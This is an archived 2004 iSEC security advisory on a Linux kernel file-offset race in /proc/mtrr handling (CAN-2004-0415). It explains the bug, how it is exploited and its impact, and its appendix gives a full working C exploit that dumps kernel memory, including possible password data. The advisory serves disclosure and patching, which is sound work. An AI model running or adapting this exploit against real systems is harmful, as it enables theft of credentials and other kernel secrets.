isec-0016-procleaks.txt

2004-08-05T00:00:00
ID PACKETSTORM:33965
Type packetstorm
Reporter Paul Starzetz
Modified 2004-08-05T00:00:00

Description

                                        
                                            `Synopsis: Linux kernel file offset pointer handling  
Product: Linux kernel  
Version: 2.4 up to to and including 2.4.26, 2.6 up to to and  
including 2.6.7  
Vendor: http://www.kernel.org/  
URL: http://isec.pl/vulnerabilities/isec-0016-procleaks.txt  
CVE: CAN-2004-0415  
Author: Paul Starzetz <ihaquer@isec.pl>  
Date: Aug 04, 2004  
  
  
  
Issue:  
======  
  
A critical security vulnerability has been found in the Linux kernel  
code handling 64bit file offset pointers.  
  
  
Details:  
========  
  
The Linux kernel offers a file handling API to the userland  
applications. Basically a file can be identified by a file name and  
opened through the open(2) system call which in turn returns a file  
descriptor for the kernel file object.  
  
One of the properties of the file object is something called 'file  
offset' (f_pos member variable of the file object), which is advanced if  
one reads or writtes to the file. It can also by changed through the  
lseek(2) system call and identifies the current writing/reading position  
inside the file image on the media.  
  
There are two different versions of the file handling API inside recent  
Linux kernels: the old 32 bit and the new (LFS) 64 bit API. We have  
identified numerous places, where invalid conversions from 64 bit sized  
file offsets to 32 bit ones as well as insecure access to the file  
offset member variable take place.  
  
We have found that most of the /proc entries (like /proc/version) leak  
about one page of unitialized kernel memory and can be exploited to  
obtain sensitive data.  
  
We have found dozens of places with suspicious or bogus code. One of  
them resides in the MTRR handling code for the i386 architecture:  
  
  
static ssize_t mtrr_read(struct file *file, char *buf, size_t len,  
loff_t *ppos)  
{  
[1] if (*ppos >= ascii_buf_bytes) return 0;  
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;  
if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;  
[3] *ppos += len;  
return len;  
} /* End Function mtrr_read */  
  
  
It is quite easy to see that since copy_to_user can sleep, the second  
reference to *ppos may use another value. Or in other words, code  
operating on the file->f_pos variable through a pointer must be atomic  
in respect to the current thread. We expect even more troubles in the  
SMP case though.  
  
  
Exploitation:  
=============  
  
In the following we want to concentrate onto the mttr.c code, however we  
think that also other f_pos handling code in the kernel may be  
exploitable.  
  
The idea is to use the blocking property of copy_to_user to advance the  
file->f_pos file offset to be negative allowing us to bypass the two  
checks marked with [1] and [2] in the above code.  
  
There are two situation where copy_to_user() will sleep if there is no  
page table entry for the corresponding location in the user buffer used  
to receive the data:  
  
- the underlying buffer maps a file which is not in the kernel page  
cache yet. The file content must be read from the disk first  
  
- the mmap_sem semaphore of the process's VM is in a closed state, that  
is another thread sharing the same VM caused a down_write on the  
semaphore.  
  
We use the second method as follows. One of two threads sharing same VM  
issues a madvise(2) call on a VMA that maps some, sufficiently big file  
setting the madvise flag to WILLNEED. This will issue a down_write on  
the mmap semaphore and schedule a read-ahead request for the mmaped  
file.  
  
Second thread issues in the mean time a read on the /proc/mtrr file thus  
going for sleep until the first thread returns from the madvise system  
call. The two threads will be woken up in a FIFO manner thus the first  
thread will run as first and can advance the file pointer of the proc  
file to the maximum possible value of 0x7fffffffffffffff while the  
second thread is still waiting in the scheduler queue for CPU (itn the  
non-SMP case).  
  
After the place marked with [3] has been executed, the file position  
will have a negative value and the checks [1] and [2] can be passed for  
any buffer length supplied, thus leaking the kernel memory from the  
address of ascii_buffer on to the user space.  
  
We have attached a proof-of-concept exploit code to read portions of  
kernel memory. Another exploit code we have at our disposal can use  
other /proc entries (like /proc/version) to read one page of kernel  
memory.  
  
  
Impact:  
=======  
  
Since no special privileges are required to open the /proc/mtrr file for  
reading any process may exploit the bug to read huge parts of kernel  
memory.  
  
The kernel memory dump may include very sensitive information like  
hashed passwords from /etc/shadow or even the root passwort.  
  
We have found in an experiment that after the root user logged in using  
ssh (in our case it was OpenSSH using PAM), the root passwort was keept  
in kernel memory. This is very suprising since sshd will quickly clean  
(overwrite with zeros) the memory portion used to store the password.  
But the password may have made its way through various kernel paths like  
pipes or sockets.  
  
Tested and known to be vulnerable kernel versions are all <= 2.4.26 and  
<= 2.6.7. All users are encouraged to patch all vulnerable systems as  
soon as appropriate vendor patches are released. There is no hotfix for  
this vulnerability.  
  
  
Credits:  
========  
  
Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and  
performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF  
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF  
ONE OF THE AUTHORS.  
  
  
Disclaimer:  
===========  
  
This document and all the information it contains are provided "as is",  
for educational purposes only, without warranty of any kind, whether  
express or implied.  
  
The authors reserve the right not to be responsible for the topicality,  
correctness, completeness or quality of the information provided in  
this document. Liability claims regarding damage caused by the use of  
any information provided, including any kind of information which is  
incomplete or incorrect, will therefore be rejected.  
  
  
Appendix:  
=========  
  
/*  
* gcc -O3 proc_kmem_dump.c -o proc_kmem_dump  
*  
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.  
*  
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"  
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION  
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.  
*  
*/  
  
  
#define _GNU_SOURCE  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <signal.h>  
#include <string.h>  
#include <errno.h>  
#include <unistd.h>  
#include <fcntl.h>  
#include <time.h>  
#include <sched.h>  
  
#include <sys/socket.h>  
#include <sys/select.h>  
#include <sys/time.h>  
#include <sys/mman.h>  
  
#include <linux/unistd.h>  
  
#include <asm/page.h>  
  
  
// define machine mem size in MB  
#define MEMSIZE 64  
  
  
  
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,  
uint, wh);  
  
  
  
void fatal(const char *msg)  
{  
printf("\n");  
if(!errno) {  
fprintf(stderr, "FATAL ERROR: %s\n", msg);  
}  
else {  
perror(msg);  
}  
  
printf("\n");  
fflush(stdout);  
fflush(stderr);  
exit(31337);  
}  
  
  
static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,  
size=PAGE_SIZE, us;  
static volatile int go[2];  
static loff_t off;  
static char *buf=NULL, *file, child_stack[PAGE_SIZE];  
static struct timeval tv1, tv2;  
static struct stat st;  
  
  
// child close sempahore & sleep  
int start_child(void *arg)  
{  
// unlock parent & close semaphore  
go[0]=0;  
madvise(file, csize, MADV_DONTNEED);  
madvise(file, csize, MADV_SEQUENTIAL);  
gettimeofday(&tv1, NULL);  
read(pfd, buf, 0);  
  
go[0]=1;  
r = madvise(file, csize, MADV_WILLNEED);  
if(r)  
fatal("madvise");  
  
// parent blocked on mmap_sem? GOOD!  
if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {  
r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);  
if( r == -1 )  
fatal("lseek");  
printf("\n[+] Race won!"); fflush(stdout);  
go[0]=2;  
} else {  
printf("\n[-] Race lost %d, use another file!\n", go[1]);  
fflush(stdout);  
kill(getppid(), SIGTERM);  
}  
_exit(1);  
  
return 0;  
}  
  
  
void usage(char *name)  
{  
printf("\nUSAGE: %s <file not in cache>", name);  
printf("\n\n");  
exit(1);  
}  
  
  
int main(int ac, char **av)  
{  
if(ac<2)  
usage(av[0]);  
  
// mmap big file not in cache  
r=stat(av[1], &st);  
if(r)  
fatal("stat file");  
csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);  
  
fd=open(av[1], O_RDONLY);  
if(fd<0)  
fatal("open file");  
file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);  
if(file==MAP_FAILED)  
fatal("mmap");  
close(fd);  
printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);  
fflush(stdout);  
  
pfd=open("/proc/mtrr", O_RDONLY);  
if(pfd<0)  
fatal("open");  
  
fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);  
if(fd<0)  
fatal("open data");  
  
r=ftruncate(fd, fsize);  
if(r<0)  
fatal("ftruncate");  
  
buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);  
if(buf==MAP_FAILED)  
fatal("mmap");  
close(fd);  
printf("\n[+] mmaped kernel data file at %p", buf);  
fflush(stdout);  
  
// clone thread wait for child sleep  
nc = nice(0);  
cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,  
CLONE_FILES|CLONE_VM, NULL);  
nice(19-nc);  
while(go[0]==0) {  
i++;  
}  
  
// try to read & sleep & move fpos to be negative  
gettimeofday(&tv1, NULL);  
go[1] = 1;  
r = read(pfd, buf, size );  
go[1] = 2;  
gettimeofday(&tv2, NULL);  
if(r<0)  
fatal("read");  
while(go[0]!=2) {  
i++;  
}  
  
us = tv2.tv_sec - tv1.tv_sec;  
us *= 1000000;  
us += (tv2.tv_usec - tv1.tv_usec) ;  
  
printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);  
r = _llseek(pfd, 0, 0, &off, SEEK_CUR);  
if(r < 0 ) {  
printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");  
fflush(stdout);  
i=0;  
for(;;) {  
r = read(pfd, buf, PAGE_SIZE );  
if(r!=PAGE_SIZE)  
break;  
buf += PAGE_SIZE;  
i++;  
printf("\r PAGE %6d", i); fflush(stdout);  
}  
printf("\n[+] done, err=%s", strerror(errno) );  
fflush(stdout);  
}  
close(pfd);  
  
printf("\n");  
sleep(1);  
kill(cpid, 9);  
  
return 0;  
}  
  
`